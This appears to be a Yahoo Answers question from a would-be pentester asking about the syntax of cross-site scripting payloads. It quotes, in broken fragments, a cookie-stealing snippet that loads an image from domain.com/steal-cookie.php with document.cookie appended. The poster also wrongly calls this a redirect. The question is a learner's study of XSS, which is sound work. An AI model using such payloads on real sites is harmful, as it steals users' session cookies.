Cross site scripting quesiton.?

Update: So I'm starting to study web vulnerabilities because I want to become pentester and I want to make my own secure site. that's beside the point, I wanted to start of some of the well-known exploits and started looking at xss, so far understand why it's bad and I understand how works but I wanted to go in... show more So I'm starting to study web vulnerabilities because I want to become pentester and I want to make my own secure site. that's beside the point, I wanted to start of some of the well-known exploits and started looking at xss, so far understand why it's bad and I understand how works but I wanted to go in the syntax of injecting script. Here's example I dug up on Mozilla

(newImage()).src="http://www.domain.com...
Update 2: /steal-cookie.php?cookie="+document.cookie sorry, Yahoo would not display the xss together. now I understand that this javascript and that it is using the document.cookie API and this essentially causes the target website to redirect to domain.com but I'm curious about the syntax because I've seen... show more /steal-cookie.php?cookie="+document.cook...

sorry, Yahoo would not display the xss together.
now I understand that this javascript and that it is using the document.cookie API and this essentially causes the target website to redirect to domain.com but I'm curious about the syntax because I've seen other examples that seem similar but have small differences.
1 answer 1